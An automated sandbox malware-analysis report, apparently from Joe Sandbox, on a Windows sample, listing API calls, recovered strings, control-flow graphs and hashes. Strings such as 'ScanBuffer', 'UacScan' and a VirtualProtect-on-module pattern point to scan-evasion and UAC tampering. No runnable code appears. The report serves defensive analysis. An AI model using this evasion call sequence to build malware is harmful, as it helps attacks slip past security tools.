                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0281C9EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: CheckConnectionInternet
                  • String ID: Initialize$OpenSession$ScanBuffer
                  • API String ID: 3847983778-3852638603
                  • Opcode ID: a15da32b71548882aab849c3b4d712676edcea51c905a6bfe67082380abff512
                  • Instruction ID: 27ad24df21028bde930a42d48cb65b5c920a27ed331551ab4173d11ee5f3f687
                  • Opcode Fuzzy Hash: a15da32b71548882aab849c3b4d712676edcea51c905a6bfe67082380abff512
                  • Instruction Fuzzy Hash: 3C41107DA902489BEB41EBE8DC80E9EB3FAEF49700F104426E101F72D0DA74AD058F52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                    • Part of subcall function 02816D28: CLSIDFromProgID.OLE32(00000000,?,00000000,02816D75,?,?,?,00000000), ref: 02816D55
                  • CoCreateInstance.OLE32(?,00000000,00000005,02816E68,00000000,00000000,02816DE7,?,00000000,02816E57), ref: 02816DD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateFromInstanceProg
                  • String ID:
                  • API String ID: 2151042543-0
                  • Opcode ID: 973cc5ff6bc684bc60b79b42844d1ffd977576e28121f80e81e47d3a9c230ce4
                  • Instruction ID: ca7c966a38607662b1afb8b7f9a9cdbfb145a102a0d090017d534071b8c42c8c
                  • Opcode Fuzzy Hash: 973cc5ff6bc684bc60b79b42844d1ffd977576e28121f80e81e47d3a9c230ce4
                  • Instruction Fuzzy Hash: D001247C2047086EE701DF65EC5286B7BACEB49B10FA20435F841D26C0F634A910C961
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 4545 2801724-2801736 4546 2801968-280196d 4545->4546 4547 280173c-280174c 4545->4547 4548 2801a80-2801a83 4546->4548 4549 2801973-2801984 4546->4549 4550 28017a4-28017ad 4547->4550 4551 280174e-280175b 4547->4551 4555 2801684-28016ad VirtualAlloc 4548->4555 4556 2801a89-2801a8b 4548->4556 4552 2801986-28019a2 4549->4552 4553 2801938-2801945 4549->4553 4550->4551 4554 28017af-28017bb 4550->4554 4557 2801774-2801780 4551->4557 4558 280175d-280176a 4551->4558 4563 28019b0-28019bf 4552->4563 4564 28019a4-28019ac 4552->4564 4553->4552 4566 2801947-280195b Sleep 4553->4566 4554->4551 4565 28017bd-28017c9 4554->4565 4559 28016df-28016e5 4555->4559 4560 28016af-28016dc call 2801644 4555->4560 4561 28017f0-28017f9 4557->4561 4562 2801782-2801790 4557->4562 4567 2801794-28017a1 4558->4567 4568 280176c-2801770 4558->4568 4560->4559 4575 28017fb-2801808 4561->4575 4576 280182c-2801836 4561->4576 4572 28019c1-28019d5 4563->4572 4573 28019d8-28019e0 4563->4573 4571 2801a0c-2801a22 4564->4571 4565->4551 4574 28017cb-28017de Sleep 4565->4574 4566->4552 4569 280195d-2801964 Sleep 4566->4569 4569->4553 4582 2801a24-2801a32 4571->4582 4583 2801a3b-2801a47 4571->4583 4572->4571 4579 28019e2-28019fa 4573->4579 4580 28019fc-28019fe call 28015cc 4573->4580 4574->4551 4578 28017e4-28017eb Sleep 4574->4578 4575->4576 4581 280180a-280181e Sleep 4575->4581 4584 28018a8-28018b4 4576->4584 4585 2801838-2801863 4576->4585 4578->4550 4590 2801a03-2801a0b 4579->4590 4580->4590 4581->4576 4592 2801820-2801827 Sleep 4581->4592 4582->4583 4593 2801a34 4582->4593 4586 2801a68 4583->4586 4587 2801a49-2801a5c 4583->4587 4588 28018b6-28018c8 4584->4588 4589 28018dc-28018eb call 28015cc 4584->4589 4594 2801865-2801873 4585->4594 4595 280187c-280188a 4585->4595 4596 2801a6d-2801a7f 4586->4596 4587->4596 4597 2801a5e-2801a63 call 2801500 4587->4597 4600 28018ca 4588->4600 4601 28018cc-28018da 4588->4601 4606 28018fd-2801936 4589->4606 4610 28018ed-28018f7 4589->4610 4592->4575 4593->4583 4594->4595 4603 2801875 4594->4603 4598 28018f8 4595->4598 4599 280188c-28018a6 call 2801500 4595->4599 4597->4596 4598->4606 4599->4606 4600->4601 4601->4606 4603->4595
                  APIs
                  • Sleep.KERNEL32(00000000), ref: 028017D0
                  • Sleep.KERNEL32(0000000A,00000000), ref: 028017E6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: a1f90150c8a6f03bb620c102672da686bd6b890250876f8eeefedd3feadf7cca
                  • Instruction ID: 0c6a3e04aee948c8ea3531e27fa68acf0df76b3fc11f0635c9efbfdd71f04054
                  • Opcode Fuzzy Hash: a1f90150c8a6f03bb620c102672da686bd6b890250876f8eeefedd3feadf7cca
                  • Instruction Fuzzy Hash: 2FB1FF7EA002518BCB95CF68D8CC365BBE1EB85325F1886AED44DCB3CAC7709561CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02817BA5,?,?,00000000,00000000), ref: 02817B61
                  • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02817B67
                  • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02817BA5,?,?,00000000,00000000), ref: 02817B81
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressHandleModuleProcProtectVirtual
                  • String ID: irtualProtect$kernel32
                  • API String ID: 2099061454-2063912171
                  • Opcode ID: 918ebd812ea713a6a581ca228e9ac600be19058d031d012669eb42730a2c9cee
                  • Instruction ID: 40491839983fab647061ba01868324ccdfda49851a5b1a95acc76014b7d11bcd
                  • Opcode Fuzzy Hash: 918ebd812ea713a6a581ca228e9ac600be19058d031d012669eb42730a2c9cee
                  • Instruction Fuzzy Hash: 62018B7D640248AFE744EFA8DC81E6EB7EDEB48710F514464FA14E36C0D734AA108A25
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 4621 2801a8c-2801a9b 4622 2801aa1-2801aa5 4621->4622 4623 2801b6c-2801b6f 4621->4623 4626 2801aa7-2801aae 4622->4626 4627 2801b08-2801b11 4622->4627 4624 2801b75-2801b7f 4623->4624 4625 2801c5c-2801c60 4623->4625 4628 2801b81-2801b8d 4624->4628 4629 2801b3c-2801b49 4624->4629 4632 2801c66-2801c6b 4625->4632 4633 28016e8-280170b call 2801644 VirtualFree 4625->4633 4630 2801ab0-2801abb 4626->4630 4631 2801adc-2801ade 4626->4631 4627->4626 4634 2801b13-2801b27 Sleep 4627->4634 4637 2801bc4-2801bd2 4628->4637 4638 2801b8f-2801b92 4628->4638 4629->4628 4635 2801b4b-2801b5f Sleep 4629->4635 4639 2801ac4-2801ad9 4630->4639 4640 2801abd-2801ac2 4630->4640 4641 2801ae0-2801af1 4631->4641 4642 2801af3 4631->4642 4649 2801716 4633->4649 4650 280170d-2801714 4633->4650 4634->4626 4643 2801b2d-2801b38 Sleep 4634->4643 4635->4628 4644 2801b61-2801b68 Sleep 4635->4644 4646 2801b96-2801b9a 4637->4646 4648 2801bd4-2801bd9 call 28014c0 4637->4648 4638->4646 4641->4642 4647 2801af6-2801b03 4641->4647 4642->4647 4643->4627 4644->4629 4651 2801bdc-2801be9 4646->4651 4652 2801b9c-2801ba2 4646->4652 4647->4624 4648->4646 4655 2801719-2801723 4649->4655 4650->4655 4651->4652 4654 2801beb-2801bf2 call 28014c0 4651->4654 4656 2801bf4-2801bfe 4652->4656 4657 2801ba4-2801bc2 call 2801500 4652->4657 4654->4652 4660 2801c00-2801c28 VirtualFree 4656->4660 4661 2801c2c-2801c59 call 2801560 4656->4661
                  APIs
                  • Sleep.KERNEL32(00000000,?), ref: 02801B17
                  • Sleep.KERNEL32(0000000A,00000000,?), ref: 02801B31
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: 6914b59637d5549c34e8bb052d0c1289cf6ccc101592be6cbce35e071d42d917
                  • Instruction ID: e18b3d03fc42b57d6061cdb068544f8d324338d26c7a3489d6f7075717598ba4
                  • Opcode Fuzzy Hash: 6914b59637d5549c34e8bb052d0c1289cf6ccc101592be6cbce35e071d42d917
                  • Instruction Fuzzy Hash: 9D518B7D6012408FEB95CF6C8DDC766BBD0AB49328F1885AED44CCB2C6E7609445CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0281C9EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: CheckConnectionInternet
                  • String ID: Initialize$OpenSession$ScanBuffer
                  • API String ID: 3847983778-3852638603
                  • Opcode ID: c6f5d631f815accfe8842bd458a3ec5e9ab2fd890011049478d2a605f1b988e9
                  • Instruction ID: f32b6aa3779810f14b03e1de9fd2d85f079d854598e41767209c74797897dc20
                  • Opcode Fuzzy Hash: c6f5d631f815accfe8842bd458a3ec5e9ab2fd890011049478d2a605f1b988e9
                  • Instruction Fuzzy Hash: E3411F7DA902489BEB41EBA8DC80E9EB3FAEF49700F104426E101F72D0DA74AD058F52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • LoadLibraryW.KERNEL32(?,00000000,02817C9A), ref: 02817C18
                  • GetModuleHandleW.KERNEL32(?,?,00000000,02817C9A), ref: 02817C1E
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 02817C37
                    • Part of subcall function 02817B20: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02817BA5,?,?,00000000,00000000), ref: 02817B61
                    • Part of subcall function 02817B20: GetProcAddress.KERNEL32(00000000,kernel32), ref: 02817B67
                    • Part of subcall function 02817B20: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02817BA5,?,?,00000000,00000000), ref: 02817B81
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
                  • String ID:
                  • API String ID: 2543409266-0
                  • Opcode ID: b7b0948e9424216c7871e8ad2287bc267f086319fd64a4764b35279f0959520d
                  • Instruction ID: c127f47e5d641545a3724ee7cd949525ed94ace10263ad75fb3c54a4243444ab
                  • Opcode Fuzzy Hash: b7b0948e9424216c7871e8ad2287bc267f086319fd64a4764b35279f0959520d
                  • Instruction Fuzzy Hash: 2601CC7C640204AFF754EBACED95E1E77BDEB45300F580464A619D33C1DB7499148F15
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 4800 280e320-280e32c 4801 280e33b-280e340 4800->4801 4802 280e32e-280e334 VariantClear call 280dfec 4800->4802 4803 280e351-280e356 4801->4803 4804 280e342-280e34f call 28044a0 4801->4804 4809 280e339 4802->4809 4807 280e362-280e367 4803->4807 4808 280e358-280e360 4803->4808 4810 280e397-280e39a 4804->4810 4812 280e372-280e37d call 2812e60 4807->4812 4813 280e369-280e370 call 280e1a4 4807->4813 4808->4810 4809->4810 4819 280e38b-280e392 VariantClear VariantInit 4812->4819 4820 280e37f-280e389 4812->4820 4813->4810 4819->4810 4820->4810
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ClearVariant
                  • String ID:
                  • API String ID: 1473721057-0
                  • Opcode ID: 97dea902b043102dd2acc6cd1cf373ce94f6cc8b2c2ebd7cd4cfe9520fbebc4a
                  • Instruction ID: afb98b65e1c4a966132745f9a34bde0161874201d1cb18030dc820973fa197cb
                  • Opcode Fuzzy Hash: 97dea902b043102dd2acc6cd1cf373ce94f6cc8b2c2ebd7cd4cfe9520fbebc4a
                  • Instruction Fuzzy Hash: E5F0AF2C7162148A97E06B38CCC4AAF3F9AAF41718B1A5C26A44ADB2D1CB24CC05C663
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 4822 2817098-28170e2 call 2804f04 4825 28170e4-28170f6 call 280b004 call 2803e5c 4822->4825 4826 28170fb-28170fd 4822->4826 4825->4826 4828 2817103-2817117 4826->4828 4829 28172c4-28172eb 4826->4829 4833 2817119-2817133 4828->4833 4831 2817315-2817318 4829->4831 4832 28172ed-28172fc 4829->4832 4837 2817329-2817345 4831->4837 4838 281731a-281731c 4831->4838 4835 2817303-2817313 4832->4835 4836 28172fe 4832->4836 4839 2817135-2817148 4833->4839 4840 281714d-2817151 4833->4840 4835->4837 4836->4835 4850 281734a-281734c 4837->4850 4838->4837 4841 281731e-2817322 4838->4841 4842 28172bb-28172be 4839->4842 4843 2817153-2817162 4840->4843 4844 28171c7-28171c9 4840->4844 4841->4837 4847 2817324 4841->4847 4842->4829 4842->4833 4848 2817194-28171bc call 2805374 4843->4848 4849 2817164-2817192 call 2805374 4843->4849 4845 2817210-2817214 4844->4845 4846 28171cb-28171cf 4844->4846 4853 2817216-281721e 4845->4853 4854 2817289-28172a0 4845->4854 4851 28171d1-28171db 4846->4851 4852 28171f3-281720b 4846->4852 4847->4837 4870 28171bf-28171c2 4848->4870 4849->4870 4856 2817356-281735b 4850->4856 4857 281734e-2817351 call 2817670 4850->4857 4851->4852 4862 28171dd-28171ee call 280ea94 4851->4862 4863 28172b7 4852->4863 4864 2817220-281725c call 2805374 4853->4864 4865 281725e-2817287 4853->4865 4854->4863 4867 28172a2-28172a6 4854->4867 4860 2817379-281738b 4856->4860 4861 281735d-281736a 4856->4861 4857->4856 4878 281738d-281739d SysFreeString 4860->4878 4879 281739f 4860->4879 4871 2817375-2817377 4861->4871 4872 281736c-2817370 call 2805350 4861->4872 4862->4852 4863->4842 4864->4863 4865->4863 4867->4863 4869 28172a8-28172b4 4867->4869 4869->4863 4870->4863 4871->4860 4871->4861 4872->4871 4878->4878 4878->4879
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 02817396
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeString
                  • String ID: H
                  • API String ID: 3341692771-2852464175
                  • Opcode ID: 88e1740ccc61f191347b3740e3db3c2080a5caf6bfb0c20c4868f522b2387444
                  • Instruction ID: 365dfbdc3a3cedeb748e5f6bbe75728f8d36accee5ccfcdccc43692fdd365dbc
                  • Opcode Fuzzy Hash: 88e1740ccc61f191347b3740e3db3c2080a5caf6bfb0c20c4868f522b2387444
                  • Instruction Fuzzy Hash: 26B1C078A016099FDB14CF98D880A9DFBF6FF89314F648569E909EB3A0D730A845CF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 4880 280e3b8-280e3c8 4881 280e3e7-280e3eb 4880->4881 4882 280e3ca-280e4b8 call 280e3b8 4880->4882 4884 280e3f4-280e400 VariantInit 4881->4884 4885 280e3ed-280e3f2 4881->4885 4887 280e403-280e41c 4884->4887 4885->4887 4889 280e42c-280e431 4887->4889 4890 280e41e 4887->4890 4891 280e433-280e436 4889->4891 4892 280e438-280e43f 4889->4892 4890->4892 4893 280e420-280e423 4890->4893 4891->4892 4895 280e459-280e465 call 2812e60 4891->4895 4896 280e441-280e44e call 2817501 4892->4896 4897 280e483-280e494 4892->4897 4893->4892 4894 280e425-280e428 4893->4894 4894->4892 4898 280e42a 4894->4898 4906 280e467-280e47c 4895->4906 4907 280e47e call 280dc54 4895->4907 4903 280e454-280e457 4896->4903 4901 280e496-280e4a6 call 280e7c8 call 280e39c 4897->4901 4902 280e4ab 4897->4902 4898->4895 4901->4902 4903->4897 4906->4897 4907->4897
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: InitVariant
                  • String ID:
                  • API String ID: 1927566239-0
                  • Opcode ID: 46a47e51f2fda9e196b50960e82f7b9350144d037975d07bcd19f42fee114b00
                  • Instruction ID: b3cc07611eeeae3c751ccd9d1f68c3592f20776bd1347066fbaa441dabb17067
                  • Opcode Fuzzy Hash: 46a47e51f2fda9e196b50960e82f7b9350144d037975d07bcd19f42fee114b00
                  • Instruction Fuzzy Hash: C331207D9049089BEB94DEACCCC4AAF7BE8EB4C214F448965F909D62D0D374E950CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 4924 286c14d-286c15b 4925 286c199-286c19e 4924->4925 4926 286c1a0-286c1a2 4925->4926 4927 286c15d-286c168 LoadLibraryA 4925->4927 4928 286c1a5-286c1a9 4926->4928 4929 286c1aa-286c1ac 4927->4929 4930 286c16a-286c16f 4927->4930 4929->4928 4931 286c190-286c194 4930->4931 4932 286c196 4931->4932 4933 286c171 4931->4933 4932->4925 4934 286c173-286c176 4933->4934 4935 286c178-286c17b 4933->4935 4936 286c17d-286c17f 4934->4936 4935->4936 4936->4929 4937 286c181-286c189 4936->4937 4937->4929 4939 286c18b-286c18d 4937->4939 4939->4931
                  APIs
                  • LoadLibraryA.KERNEL32(0000C087,?,?,?,00000000,0286C0C7,?,?,?,?,?), ref: 0286C160
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.000000000286C000.00000040.00001000.00020000.00000000.sdmp, Offset: 0286C000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_286c000_SecuriteInfo.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
                  • Instruction ID: b38f83ed903ebec9b110979f5fc923caa81cf60d83eb78c2c108feb46bb82f62
                  • Opcode Fuzzy Hash: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
                  • Instruction Fuzzy Hash: BAF0A47E6043169FEB108E95CC5C67773E8AEA516970A042AE9CAD7201E725E800C7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • CLSIDFromProgID.OLE32(00000000,?,00000000,02816D75,?,?,?,00000000), ref: 02816D55
                    • Part of subcall function 02804C24: SysFreeString.OLEAUT32(0281D42C), ref: 02804C32
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeFromProgString
                  • String ID:
                  • API String ID: 4225568880-0
                  • Opcode ID: a28cd181d94c5baeb0dac1e88a351e12bac2180ac72a9b49f578274a1a1c0df1
                  • Instruction ID: 1cf2960cdf2dc7f2d1566825937f775292b6ff063c3f5e89a4efa81a896ddc01
                  • Opcode Fuzzy Hash: a28cd181d94c5baeb0dac1e88a351e12bac2180ac72a9b49f578274a1a1c0df1
                  • Instruction Fuzzy Hash: 87E0E53C200614BFE700EA7ACC9194977EDDF49710BA20471A900D3280E9B57E0088A2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetModuleFileNameA.KERNEL32(02800000,?,00000105), ref: 0280584A
                    • Part of subcall function 02805A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02800000,0282B790), ref: 02805AAC
                    • Part of subcall function 02805A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02800000,0282B790), ref: 02805ACA
                    • Part of subcall function 02805A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02800000,0282B790), ref: 02805AE8
                    • Part of subcall function 02805A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02805B06
                    • Part of subcall function 02805A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02805B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02805B4F
                    • Part of subcall function 02805A90: RegQueryValueExA.ADVAPI32(?,02805CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02805B95,?,80000001), ref: 02805B6D
                    • Part of subcall function 02805A90: RegCloseKey.ADVAPI32(?,02805B9C,00000000,?,?,00000000,02805B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02805B8F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Open$FileModuleNameQueryValue$Close
                  • String ID:
                  • API String ID: 2796650324-0
                  • Opcode ID: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                  • Instruction ID: d9e0cb09d7fc0c171f61c0e4c681dd4ad9de5b373b9349a6c5c1ea82b3c9f7ef
                  • Opcode Fuzzy Hash: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                  • Instruction Fuzzy Hash: C3E06D79A002148BCB94DE5C8CC4A5733D8BB08754F440961EC68CF286D374D9208FE1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetFileAttributesA.KERNEL32(00000000,?,0281E0EE,ScanString,02864344,02828FEC,OpenSession,02864344,02828FEC,ScanString,02864344,02828FEC,UacScan,02864344,02828FEC,UacInitialize), ref: 02807E23
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: f576f8495b3edd4a8e24de7a91902ce1e57f9f8a29b3fb9936075822a1a21783
                  • Instruction ID: 2832ffe1b1510c0d766c26ecef2f8c81cd4f0afea26ed2e24bc8b40386554cf9
                  • Opcode Fuzzy Hash: f576f8495b3edd4a8e24de7a91902ce1e57f9f8a29b3fb9936075822a1a21783
                  • Instruction Fuzzy Hash: E8C08CAD6033000A5AD061FC0CC901A4388094413D3280B39B03CDA2E2E321A8222861
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SysFreeString.OLEAUT32(0281D42C), ref: 02804C32
                  • SysReAllocStringLen.OLEAUT32(02829E68,0281D42C,00000016), ref: 02804C7A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: String$AllocFree
                  • String ID:
                  • API String ID: 344208780-0
                  • Opcode ID: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
                  • Instruction ID: 7be662f72a611581f93a54bc4a3f58bf75c485c0d3b15ec1e3f9a163581e212d
                  • Opcode Fuzzy Hash: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
                  • Instruction Fuzzy Hash: F4D0126C1401015ABFFC95194ED893661AADBD030A75C8A5D9A0ACA1C0E7B59800CA35
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • timeSetEvent.WINMM(00002710,00000000,02829B48,00000000,00000001), ref: 02829B64
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Eventtime
                  • String ID:
                  • API String ID: 2982266575-0
                  • Opcode ID: 2d7efa23aeec1c34c628d2ea77c63be3b472cc0cdf225c6ff72bf2103029213d
                  • Instruction ID: 9ea7b14125d6d5abc3ec8bfc5805ca7750eff2cf5969a36a9b4b582cfee114d8
                  • Opcode Fuzzy Hash: 2d7efa23aeec1c34c628d2ea77c63be3b472cc0cdf225c6ff72bf2103029213d
                  • Instruction Fuzzy Hash: 47C092FC7D13103EFA205AA81CD6F67558DD704B01F602812FB00EE2C1D9E268641664
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02801A03), ref: 028015E2
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 3ecb660dc394f53d7b972176e7c3627a4e5f761e2f121a4ba6c5019568e0f4d2
                  • Instruction ID: b760af01f53e0a64369194cfcfac180ee1f16c80ac4dae70a18ecac7d2d7d313
                  • Opcode Fuzzy Hash: 3ecb660dc394f53d7b972176e7c3627a4e5f761e2f121a4ba6c5019568e0f4d2
                  • Instruction Fuzzy Hash: F4F037F8B413004BDB45DF799D9D3056AD2E789346F148579E60DDB3DAE77184028B10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 028016A4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: d29cc85077256a5f7cc846e33fe9d62bf8018dfe89e0ded13376b8b034b1d6bb
                  • Instruction ID: 4af8c2f282e4e46e93f28c396e052c308f90c1195c1d9e3731897a2c7556a168
                  • Opcode Fuzzy Hash: d29cc85077256a5f7cc846e33fe9d62bf8018dfe89e0ded13376b8b034b1d6bb
                  • Instruction Fuzzy Hash: A1F09AFAB406957BD7109E9A9CC8B92BBA4FB04725F050179EA0CDB381D7B0A8148B94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02801704
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeVirtual
                  • String ID:
                  • API String ID: 1263568516-0
                  • Opcode ID: c96ad9f9f81323b228b2f437788a85b5fa3e7182a18aa727f16b3f68cc2f55e5
